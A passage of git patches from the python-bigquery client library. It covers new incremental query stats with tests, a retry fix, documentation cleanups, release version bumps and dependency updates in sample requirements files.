([ef2740a](https://github.com/googleapis/python-bigquery/commit/ef2740a158199633b5543a7b6eb19587580792cd)) + + +### Bug Fixes + +* Remove deepcopy while setting properties for _QueryResults ([#2280](https://github.com/googleapis/python-bigquery/issues/2280)) ([33ea296](https://github.com/googleapis/python-bigquery/commit/33ea29616c06a2e2a106a785d216e784737ae386)) + + +### Documentation + +* Clarify that the presence of `XyzJob.errors` doesn't necessarily mean that the job has not completed or was unsuccessful ([#2278](https://github.com/googleapis/python-bigquery/issues/2278)) ([6e88d7d](https://github.com/googleapis/python-bigquery/commit/6e88d7dbe42ebfc35986da665d656b49ac481db4)) +* Clarify the api_method arg for client.query() ([#2277](https://github.com/googleapis/python-bigquery/issues/2277)) ([8a13c12](https://github.com/googleapis/python-bigquery/commit/8a13c12905ffcb3dbb6086a61df37556f0c2cd31)) + ## [3.36.0](https://github.com/googleapis/python-bigquery/compare/v3.35.1...v3.36.0) (2025-08-20) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index a8f4c8e14..aa24ae04e 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.36.0" +__version__ = "3.37.0" From 7b1b718123afd80c0f68212946e4179bcd6db67f Mon Sep 17 00:00:00 2001 From: shollyman Date: Sat, 13 Sep 2025 08:02:19 -0700 Subject: [PATCH 171/202] feat: add additional query stats (#2270) * feat: add additional query stats This PR adds support for incremental query stats. --- google/cloud/bigquery/job/__init__.py | 2 + google/cloud/bigquery/job/query.py | 67 +++++++++++++++++++++++++++ tests/unit/job/test_query.py | 17 +++++++ tests/unit/job/test_query_stats.py | 61 ++++++++++++++++++++++++ 4 files changed, 147 insertions(+) diff --git a/google/cloud/bigquery/job/__init__.py b/google/cloud/bigquery/job/__init__.py index f51311b0b..4cda65965 100644 --- a/google/cloud/bigquery/job/__init__.py +++ b/google/cloud/bigquery/job/__init__.py @@ -39,6 +39,7 @@ from google.cloud.bigquery.job.query import QueryPlanEntryStep from google.cloud.bigquery.job.query import ScriptOptions from google.cloud.bigquery.job.query import TimelineEntry +from google.cloud.bigquery.job.query import IncrementalResultStats from google.cloud.bigquery.enums import Compression from google.cloud.bigquery.enums import CreateDisposition from google.cloud.bigquery.enums import DestinationFormat @@ -84,4 +85,5 @@ "SourceFormat", "TransactionInfo", "WriteDisposition", + "IncrementalResultStats", ] diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index b377f979d..38b8a7148 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -197,6 +197,66 @@ def from_api_repr(cls, stats: Dict[str, str]) -> "DmlStats": return cls(*args) +class IncrementalResultStats: + """IncrementalResultStats provides information about incremental query execution.""" + + def __init__(self): + self._properties = {} + + @classmethod + def from_api_repr(cls, resource) -> "IncrementalResultStats": + """Factory: construct instance from the JSON repr. + + Args: + resource(Dict[str: object]): + IncrementalResultStats representation returned from API. + + Returns: + google.cloud.bigquery.job.IncrementalResultStats: + stats parsed from ``resource``. + """ + entry = cls() + entry._properties = resource + return entry + + @property + def disabled_reason(self): + """Optional[string]: Reason why incremental results were not + written by the query. + """ + return _helpers._str_or_none(self._properties.get("disabledReason")) + + @property + def result_set_last_replace_time(self): + """Optional[datetime]: The time at which the result table's contents + were completely replaced. May be absent if no results have been written + or the query has completed.""" + from google.cloud._helpers import _rfc3339_nanos_to_datetime + + value = self._properties.get("resultSetLastReplaceTime") + if value: + try: + return _rfc3339_nanos_to_datetime(value) + except ValueError: + pass + return None + + @property + def result_set_last_modify_time(self): + """Optional[datetime]: The time at which the result table's contents + were modified. May be absent if no results have been written or the + query has completed.""" + from google.cloud._helpers import _rfc3339_nanos_to_datetime + + value = self._properties.get("resultSetLastModifyTime") + if value: + try: + return _rfc3339_nanos_to_datetime(value) + except ValueError: + pass + return None + + class IndexUnusedReason(typing.NamedTuple): """Reason about why no search index was used in the search query (or sub-query). @@ -1339,6 +1399,13 @@ def bi_engine_stats(self) -> Optional[BiEngineStats]: else: return BiEngineStats.from_api_repr(stats) + @property + def incremental_result_stats(self) -> Optional[IncrementalResultStats]: + stats = self._job_statistics().get("incrementalResultStats") + if stats is None: + return None + return IncrementalResultStats.from_api_repr(stats) + def _blocking_poll(self, timeout=None, **kwargs): self._done_timeout = timeout self._transport_timeout = timeout diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index ef6429598..4a6771c46 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -838,6 +838,23 @@ def test_search_stats(self): assert isinstance(job.search_stats, SearchStats) assert job.search_stats.mode == "INDEX_USAGE_MODE_UNSPECIFIED" + def test_incremental_result_stats(self): + from google.cloud.bigquery.job.query import IncrementalResultStats + + client = _make_client(project=self.PROJECT) + job = self._make_one(self.JOB_ID, self.QUERY, client) + assert job.incremental_result_stats is None + + statistics = job._properties["statistics"] = {} + assert job.incremental_result_stats is None + + query_stats = statistics["query"] = {} + assert job.incremental_result_stats is None + + query_stats["incrementalResultStats"] = {"disabledReason": "BAZ"} + assert isinstance(job.incremental_result_stats, IncrementalResultStats) + assert job.incremental_result_stats.disabled_reason == "BAZ" + def test_reload_query_results_uses_transport_timeout(self): conn = make_connection({}) client = _make_client(self.PROJECT, connection=conn) diff --git a/tests/unit/job/test_query_stats.py b/tests/unit/job/test_query_stats.py index 61b278d43..c7c7a31e0 100644 --- a/tests/unit/job/test_query_stats.py +++ b/tests/unit/job/test_query_stats.py @@ -13,6 +13,7 @@ # limitations under the License. from .helpers import _Base +import datetime class TestBiEngineStats: @@ -520,3 +521,63 @@ def test_from_api_repr_normal(self): self.assertEqual(entry.pending_units, self.PENDING_UNITS) self.assertEqual(entry.completed_units, self.COMPLETED_UNITS) self.assertEqual(entry.slot_millis, self.SLOT_MILLIS) + + +class TestIncrementalResultStats: + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.job import IncrementalResultStats + + return IncrementalResultStats + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + def test_ctor_defaults(self): + stats = self._make_one() + assert stats.disabled_reason is None + assert stats.result_set_last_replace_time is None + assert stats.result_set_last_modify_time is None + + def test_from_api_repr_partial_stats(self): + klass = self._get_target_class() + stats = klass.from_api_repr({"disabledReason": "FOO"}) + + assert isinstance(stats, klass) + assert stats.disabled_reason == "FOO" + assert stats.result_set_last_replace_time is None + assert stats.result_set_last_modify_time is None + + def test_from_api_repr_full_stats(self): + klass = self._get_target_class() + stats = klass.from_api_repr( + { + "disabledReason": "BAR", + "resultSetLastReplaceTime": "2025-01-02T03:04:05.06Z", + "resultSetLastModifyTime": "2025-02-02T02:02:02.02Z", + } + ) + + assert isinstance(stats, klass) + assert stats.disabled_reason == "BAR" + assert stats.result_set_last_replace_time == datetime.datetime( + 2025, 1, 2, 3, 4, 5, 60000, tzinfo=datetime.timezone.utc + ) + assert stats.result_set_last_modify_time == datetime.datetime( + 2025, 2, 2, 2, 2, 2, 20000, tzinfo=datetime.timezone.utc + ) + + def test_from_api_repr_invalid_stats(self): + klass = self._get_target_class() + stats = klass.from_api_repr( + { + "disabledReason": "BAR", + "resultSetLastReplaceTime": "xxx", + "resultSetLastModifyTime": "yyy", + } + ) + + assert isinstance(stats, klass) + assert stats.disabled_reason == "BAR" + assert stats.result_set_last_replace_time is None + assert stats.result_set_last_modify_time is None From c9aba64c1f7240f1ad2caa00d55a1a4f86bdc8a3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 15 Sep 2025 14:21:21 +0200 Subject: [PATCH 172/202] chore(deps): update all dependencies (#2275) --- samples/desktopapp/requirements-test.txt | 2 +- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 10 +++++----- samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements-test.txt | 2 +- samples/snippets/requirements.txt | 2 +- 10 files changed, 16 insertions(+), 16 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 3bf52c85d..31b836790 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index f86e57e5c..21ccef2fd 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.36.0 +google-cloud-bigquery==3.37.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index d449b373b..6fb9ba310 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index c2bd74bed..c8a93a35e 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,6 +1,6 @@ attrs==25.3.0 certifi==2025.8.3 -cffi==1.17.1 +cffi==2.0.0 charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' click==8.2.1; python_version >= '3.10' @@ -13,8 +13,8 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.36.0 -google-cloud-bigquery-storage==2.32.0 +google-cloud-bigquery==3.37.0 +google-cloud-bigquery-storage==2.33.1 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 @@ -29,8 +29,8 @@ proto-plus==1.26.1 pyarrow==21.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 -pycparser==2.22 -pyparsing==3.2.3 +pycparser==2.23 +pyparsing==3.2.4 python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 3bf52c85d..31b836790 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 7b4f84e8e..d10d53c24 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.3 db-dtypes==1.4.3 -google.cloud.bigquery==3.36.0 -google-cloud-bigquery-storage==2.32.0 +google.cloud.bigquery==3.37.0 +google-cloud-bigquery-storage==2.33.1 ipython===8.18.1 pandas==2.3.2 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 3bf52c85d..31b836790 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index dc22903c7..f65008baa 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ bigquery-magics==0.10.3 db-dtypes==1.4.3 -google-cloud-bigquery==3.36.0 -google-cloud-bigquery-storage==2.32.0 +google-cloud-bigquery==3.37.0 +google-cloud-bigquery-storage==2.33.1 ipython===8.18.1; python_version == '3.9' ipython==9.5.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index cef3450e1..901f1df1a 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.6.4 -pytest==8.4.1 +pytest==8.4.2 mock==5.2.0 pytest-xdist==3.8.0 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 23da68d60..1fed246f3 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.36.0 +google-cloud-bigquery==3.37.0 From 7cad6cf2f95e28b46e529f99b5c4d3cc61603ca4 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Wed, 17 Sep 2025 13:23:31 -0700 Subject: [PATCH 173/202] chore(main): release 3.38.0 (#2289) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 7 +++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index fe721dfde..95db5735c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,13 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.38.0](https://github.com/googleapis/python-bigquery/compare/v3.37.0...v3.38.0) (2025-09-15) + + +### Features + +* Add additional query stats ([#2270](https://github.com/googleapis/python-bigquery/issues/2270)) ([7b1b718](https://github.com/googleapis/python-bigquery/commit/7b1b718123afd80c0f68212946e4179bcd6db67f)) + ## [3.37.0](https://github.com/googleapis/python-bigquery/compare/v3.36.0...v3.37.0) (2025-09-08) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index aa24ae04e..22550a8f1 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.37.0" +__version__ = "3.38.0" From 1f1f9d41e8a2c9016198d848ad3f1cbb88cf77b0 Mon Sep 17 00:00:00 2001 From: shollyman Date: Fri, 19 Sep 2025 10:19:42 -0700 Subject: [PATCH 174/202] docs: remove experimental annotations from GA features (#2303) * docs: remove experimental annotations from GA features Corrects some documentation drift. --- google/cloud/bigquery/external_config.py | 20 +++----------------- 1 file changed, 3 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index dc7a33e6a..7e76f93b5 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -637,11 +637,7 @@ def from_api_repr(cls, resource: dict) -> "GoogleSheetsOptions": class HivePartitioningOptions(object): - """[Beta] Options that configure hive partitioning. - - .. note:: - **Experimental**. This feature is experimental and might change or - have limited support. + """Options that configure hive partitioning. See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#HivePartitioningOptions @@ -808,13 +804,9 @@ def decimal_target_types(self, value: Optional[Iterable[str]]): @property def hive_partitioning(self): - """Optional[:class:`~.external_config.HivePartitioningOptions`]: [Beta] When set, \ + """Optional[:class:`~.external_config.HivePartitioningOptions`]: When set, \ it configures hive partitioning support. - .. note:: - **Experimental**. This feature is experimental and might change or - have limited support. - See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.hive_partitioning_options """ @@ -979,14 +971,8 @@ def timestamp_format(self, value: Optional[str]): @property def connection_id(self): - """Optional[str]: [Experimental] ID of a BigQuery Connection API + """Optional[str]: ID of a BigQuery Connection API resource. - - .. WARNING:: - - This feature is experimental. Pre-GA features may have limited - support, and changes to pre-GA features may not be compatible with - other pre-GA versions. """ return self._properties.get("connectionId") From 8bbd3d01026c493dfa5903b397d2b01c0e9bf43b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 24 Sep 2025 14:29:28 -0500 Subject: [PATCH 175/202] fix: remove ambiguous error codes from query retries (#2308) Context: internal issue b/445984807 comment 10. --- google/cloud/bigquery/retry.py | 3 --- 1 file changed, 3 deletions(-) diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 8f469f2d3..19012efd6 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -121,9 +121,6 @@ def _should_retry_get_job_conflict(exc): """ job_retry_reasons = ( - "rateLimitExceeded", - "backendError", - "internalError", "jobBackendError", "jobInternalError", "jobRateLimitExceeded", From 63d7737cb971c0c96d0b6d3505e30e4696a7bf2a Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 30 Sep 2025 17:05:06 +0100 Subject: [PATCH 176/202] chore(deps): update all dependencies (#2300) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 16 ++++++++-------- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements.txt | 2 +- 5 files changed, 15 insertions(+), 15 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 21ccef2fd..56696f868 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.37.0 +google-cloud-bigquery==3.38.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index c8a93a35e..9fdca241a 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -3,7 +3,7 @@ certifi==2025.8.3 cffi==2.0.0 charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' -click==8.2.1; python_version >= '3.10' +click==8.3.0; python_version >= '3.10' click-plugins==1.1.1.2 cligj==0.7.2 db-dtypes==1.4.3 @@ -12,32 +12,32 @@ geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 -google-auth==2.40.3 -google-cloud-bigquery==3.37.0 +google-auth==2.41.0 +google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.74.0 +grpcio==1.75.1 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.3.2 +pandas==2.3.3 proto-plus==1.26.1 pyarrow==21.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 pycparser==2.23 -pyparsing==3.2.4 +pyparsing==3.2.5 python-dateutil==2.9.0.post0 pytz==2025.2 -PyYAML==6.0.2 +PyYAML==6.0.3 requests==2.32.5 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' -Shapely==2.1.1; python_version >= '3.10' +Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index d10d53c24..331e910e2 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.3 db-dtypes==1.4.3 -google.cloud.bigquery==3.37.0 +google.cloud.bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 ipython===8.18.1 -pandas==2.3.2 +pandas==2.3.3 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index f65008baa..ef509734a 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ bigquery-magics==0.10.3 db-dtypes==1.4.3 -google-cloud-bigquery==3.37.0 +google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 ipython===8.18.1; python_version == '3.9' -ipython==9.5.0; python_version >= '3.10' +ipython==9.6.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.6; python_version >= '3.10' -pandas==2.3.2 +pandas==2.3.3 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 1fed246f3..441385536 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.37.0 +google-cloud-bigquery==3.38.0 From e118b029bbc89a5adbab83f39858c356c23665bf Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 30 Sep 2025 13:54:00 -0400 Subject: [PATCH 177/202] fix: honor custom `retry` in `job.result()` (#2302) * fix(job): honor custom retry in job.result() The `_AsyncJob.result()` method was not correctly passing the `retry` argument to the superclass's `result()` method when the `retry` object was the same as the default retry object. This caused the default retry settings to be ignored in some cases. This change modifies the `result()` method to always pass the `retry` argument to the superclass, ensuring that the provided retry settings are always honored. A new test case is added to verify that `job.result()` correctly handles both the default retry and a custom retry object. * Update tests/unit/test_job_retry.py * Update tests/unit/test_job_retry.py * blacken and lint * udpates retry handling and testing of retry handling * Update tests/unit/test_job_retry.py * Update tests/unit/test_job_retry.py * Update tests/unit/test_job_retry.py --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/job/base.py | 3 +- tests/unit/test_job_retry.py | 77 +++++++++++++++++++++++++++++++ 2 files changed, 78 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index 9b7ddb82d..7576fc9aa 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -1044,8 +1044,7 @@ def result( # type: ignore # (incompatible with supertype) if self.state is None: self._begin(retry=retry, timeout=timeout) - kwargs = {} if retry is DEFAULT_RETRY else {"retry": retry} - return super(_AsyncJob, self).result(timeout=timeout, **kwargs) + return super(_AsyncJob, self).result(timeout=timeout, retry=retry) def cancelled(self): """Check if the job has been cancelled. diff --git a/tests/unit/test_job_retry.py b/tests/unit/test_job_retry.py index 7343fed3d..fa55e8f6a 100644 --- a/tests/unit/test_job_retry.py +++ b/tests/unit/test_job_retry.py @@ -615,3 +615,80 @@ def test_query_and_wait_retries_job_for_DDL_queries(global_time_lock): _, kwargs = calls[3] assert kwargs["method"] == "POST" assert kwargs["path"] == query_request_path + + +@pytest.mark.parametrize( + "result_retry_param", + [ + pytest.param( + {}, + id="default retry {}", + ), + pytest.param( + { + "retry": google.cloud.bigquery.retry.DEFAULT_RETRY.with_timeout( + timeout=10.0 + ) + }, + id="custom retry object with timeout 10.0", + ), + ], +) +def test_retry_load_job_result(result_retry_param, PROJECT, DS_ID): + from google.cloud.bigquery.dataset import DatasetReference + from google.cloud.bigquery.job.load import LoadJob + import google.cloud.bigquery.retry + + client = make_client() + conn = client._connection = make_connection( + dict( + status=dict(state="RUNNING"), + jobReference={"jobId": "id_1"}, + ), + google.api_core.exceptions.ServiceUnavailable("retry me"), + dict( + status=dict(state="DONE"), + jobReference={"jobId": "id_1"}, + statistics={"load": {"outputRows": 1}}, + ), + ) + + table_ref = DatasetReference(project=PROJECT, dataset_id=DS_ID).table("new_table") + job = LoadJob("id_1", source_uris=None, destination=table_ref, client=client) + + with mock.patch.object( + client, "_call_api", wraps=client._call_api + ) as wrapped_call_api: + result = job.result(**result_retry_param) + + assert job.state == "DONE" + assert result.output_rows == 1 + + # Check that _call_api was called multiple times due to retry + assert wrapped_call_api.call_count > 1 + + # Verify the retry object used in the calls to _call_api + expected_retry = result_retry_param.get( + "retry", google.cloud.bigquery.retry.DEFAULT_RETRY + ) + + for call in wrapped_call_api.mock_calls: + name, args, kwargs = call + # The retry object is the first positional argument to _call_api + called_retry = args[0] + + # We only care about the calls made during the job.result() polling + if kwargs.get("method") == "GET" and "jobs/id_1" in kwargs.get("path", ""): + assert called_retry._predicate == expected_retry._predicate + assert called_retry._initial == expected_retry._initial + assert called_retry._maximum == expected_retry._maximum + assert called_retry._multiplier == expected_retry._multiplier + assert called_retry._deadline == expected_retry._deadline + if "retry" in result_retry_param: + # Specifically check the timeout for the custom retry case + assert called_retry._timeout == 10.0 + else: + assert called_retry._timeout == expected_retry._timeout + + # The number of api_request calls should still be 3 + assert conn.api_request.call_count == 3 From 9a6a1ab4396f43c5fab3fcc646824761182a9310 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 1 Oct 2025 21:59:07 +0100 Subject: [PATCH 178/202] chore(deps): update dependency google-auth to v2.41.1 (#2312) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 9fdca241a..0a5d18d6d 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,7 +12,7 @@ geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 -google-auth==2.41.0 +google-auth==2.41.1 google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 google-cloud-core==2.4.3 From 3e116c2d9a0232f72c9cda9e1e0f5b1d767d1591 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 7 Oct 2025 00:16:21 +0100 Subject: [PATCH 179/202] chore(deps): update all dependencies (#2314) --- samples/geography/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 0a5d18d6d..8955e0cfd 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ -attrs==25.3.0 -certifi==2025.8.3 +attrs==25.4.0 +certifi==2025.10.5 cffi==2.0.0 charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' @@ -11,7 +11,7 @@ Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' -google-api-core==2.25.1 +google-api-core==2.25.2 google-auth==2.41.1 google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 From 4251fee3c5113ccc14fdb11172548b5427caeb59 Mon Sep 17 00:00:00 2001 From: Wabio Date: Mon, 13 Oct 2025 18:57:19 +0200 Subject: [PATCH 180/202] build: update `pyproject.toml` to follow PEP 639 (#2309) * update pyproject.toml to follow PEP 639 * Update pyproject.toml PEP 639 Thanks for the feedback, I've removed the version number completely as requested. * Update pyproject.toml --------- Co-authored-by: Chalmer Lowe --- pyproject.toml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pyproject.toml b/pyproject.toml index 9c91a2fc8..1c6ec1f77 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -19,7 +19,8 @@ build-backend = "setuptools.build_meta" [project] name = "google-cloud-bigquery" authors = [{ name = "Google LLC", email = "googleapis-packages@google.com" }] -license = { text = "Apache 2.0" } +license = "Apache-2.0" +license-files = ["LICENSE"] requires-python = ">=3.9" description = "Google BigQuery API client library" readme = "README.rst" @@ -30,7 +31,6 @@ classifiers = [ # "Development Status :: 5 - Production/Stable" "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", - "License :: OSI Approved :: Apache Software License", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", From 7fbd8c22672905b7ab0069a4d6edfee44cca40d0 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 14 Oct 2025 07:23:10 -0400 Subject: [PATCH 181/202] chore(python): Add Python 3.14 to python post processor image (#2317) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(python): Add Python 3.14 to python post processor image Source-Link: https://github.com/googleapis/synthtool/commit/16790a32126759493ba20781e04edd165825ff82 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9 * Update samples/snippets/noxfile.py * Update samples/notebooks/noxfile.py * Update samples/magics/noxfile.py * Update samples/geography/noxfile.py * Update samples/desktopapp/noxfile.py * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- .github/.OwlBot.lock.yaml | 4 +- .kokoro/samples/python3.14/common.cfg | 40 ++++++++++++++++++++ .kokoro/samples/python3.14/continuous.cfg | 6 +++ .kokoro/samples/python3.14/periodic-head.cfg | 11 ++++++ .kokoro/samples/python3.14/periodic.cfg | 6 +++ .kokoro/samples/python3.14/presubmit.cfg | 6 +++ samples/desktopapp/noxfile.py | 2 +- samples/geography/noxfile.py | 2 +- samples/magics/noxfile.py | 2 +- samples/notebooks/noxfile.py | 2 +- samples/snippets/noxfile.py | 2 +- 11 files changed, 76 insertions(+), 7 deletions(-) create mode 100644 .kokoro/samples/python3.14/common.cfg create mode 100644 .kokoro/samples/python3.14/continuous.cfg create mode 100644 .kokoro/samples/python3.14/periodic-head.cfg create mode 100644 .kokoro/samples/python3.14/periodic.cfg create mode 100644 .kokoro/samples/python3.14/presubmit.cfg diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index cea9eb68f..4a311db02 100644 --- 